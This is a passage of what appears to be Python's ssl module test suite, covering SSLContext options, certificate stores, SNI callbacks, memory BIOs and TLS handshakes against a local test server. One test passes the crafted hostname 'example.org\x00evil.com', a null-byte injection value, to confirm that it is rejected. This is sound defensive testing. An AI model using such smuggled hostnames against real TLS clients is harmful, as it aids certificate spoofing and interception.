# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': 'Mar 29 12:29:49 2033 GMT',
'notBefore': 'Mar 30 12:29:49 2003 GMT',
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
with warnings_helper.check_warnings():
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
with warnings_helper.check_warnings():
ctx = ssl._create_stdlib_context(
ssl.PROTOCOL_TLSv1_2,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True
)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1_2)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# Changing verify_mode does not affect check_hostname
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# keep CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(), server_side=True)
self.assertIsInstance(obj, MySSLObject)
def test_num_tickets(self):
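# num_tickets controls how many TLS 1.3 session tickets a server sends;
# server contexts default to 2 and accept new values, while client
# contexts expose the attribute but reject assignment (exercised below).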
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.num_tickets, 2)
ctx.num_tickets = 1
self.assertEqual(ctx.num_tickets, 1)
ctx.num_tickets = 0
self.assertEqual(ctx.num_tickets, 0)
with self.assertRaises(ValueError):
ctx.num_tickets = -1
with self.assertRaises(TypeError):
ctx.num_tickets = None
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.num_tickets, 2)
with self.assertRaises(ValueError):
ctx.num_tickets = 1
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of an SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.create_server(("127.0.0.1", 0)) as s:
c = socket.create_connection(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
def test_bad_server_hostname(self):
ctx = ssl.create_default_context()
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="")
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname=".example.org")
with self.assertRaises(TypeError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="example.org\x00evil.com")
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class SSLObjectTests(unittest.TestCase):
def test_private_init(self):
bio = ssl.MemoryBIO()
with self.assertRaisesRegex(TypeError, "public constructor"):
ssl.SSLObject(bio, bio)
def test_unwrap(self):
client_ctx, server_ctx, hostname = testing_context()
c_in = ssl.MemoryBIO()
c_out = ssl.MemoryBIO()
s_in = ssl.MemoryBIO()
s_out = ssl.MemoryBIO()
client = client_ctx.wrap_bio(c_in, c_out, server_hostname=hostname)
server = server_ctx.wrap_bio(s_in, s_out, server_side=True)
# Loop on the handshake for a bit to get it settled
for _ in range(5):
try:
client.do_handshake()
except ssl.SSLWantReadError:
pass
if c_out.pending:
s_in.write(c_out.read())
try:
server.do_handshake()
except ssl.SSLWantReadError:
pass
if s_out.pending:
c_in.write(s_out.read())
# Now the handshakes should be complete (don't raise WantReadError)
client.do_handshake()
server.do_handshake()
# Now if we unwrap one side unilaterally, it should send close-notify
# and raise WantReadError:
with self.assertRaises(ssl.SSLWantReadError):
client.unwrap()
# But server.unwrap() does not raise, because it reads the client's
# close-notify:
s_in.write(c_out.read())
server.unwrap()
# And now that the client gets the server's close-notify, it doesn't
# raise either.
c_in.write(s_out.read())
client.unwrap()
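# The test above drives both SSLObject endpoints by hand: whatever one side
# writes into its outgoing MemoryBIO is copied into the peer's incoming BIO,
# which is what a real transport would otherwise do.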
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
self.server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.server_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=self.server_context)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
s = ctx.wrap_socket(
socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME
)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm changed between OpenSSL 0.9.8n
# and 1.0.0; as a result, the capath directory must contain both
# versions of each certificate (same content, different filename)
# for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
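# Non-blocking handshake pattern: keep calling do_handshake() and,
# whenever it raises SSLWantReadError/SSLWantWriteError, use select()
# to wait until the socket is readable/writable before retrying.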
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_sni(self):
host, port = self.server_addr
server_names = []
# We store servername_cb arguments to make sure they match the host
def servername_cb(ssl_sock, server_name, initial_context):
server_names.append(server_name)
self.server_context.set_servername_callback(servername_cb)
pem = ssl.get_server_certificate((host, port))
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=SIGNING_CA)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port, pem))
self.assertEqual(server_names, [host, host])
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_get_server_certificate_timeout(self):
def servername_cb(ssl_sock, server_name, initial_context):
time.sleep(0.2)
self.server_context.set_servername_callback(servername_cb)
with self.assertRaises(socket.timeout):
ssl.get_server_certificate(self.server_addr, ca_certs=SIGNING_CA,
timeout=0.1)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname='localhost') as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx1.load_verify_locations(capath=CAPATH)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx2.load_verify_locations(capath=CAPATH)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple I/O loop. Call func(*args) and, depending on the error we
# get (WANT_READ or WANT_WRITE), move data between the socket and the BIOs.
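# The SSL object never touches the network directly: it reads TLS
# records from `incoming` and writes TLS records to `outgoing`, so this
# loop shuttles those bytes to and from the real socket.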
timeout = kwargs.get('timeout', support.SHORT_TIMEOUT)
deadline = time.monotonic() + timeout
count = 0
while True:
if time.monotonic() > deadline:
self.fail("timeout")
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
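# `incoming` buffers TLS data received from the peer (to be fed to the
# SSL object), while `outgoing` collects TLS data the SSL object wants
# sent; ssl_io_loop() moves these bytes to/from the plain socket.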
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.load_verify_locations(SIGNING_CA)
sslobj = ctx.wrap_bio(incoming, outgoing, False,
SIGNED_CERTFILE_HOSTNAME)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.version())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertIsNotNone(sslobj.version())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
@support.requires_resource('network')
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with socket_helper.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
elif rc == errno.ENETUNREACH:
self.skipTest("Network unreachable.")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with socket_helper.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
# should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
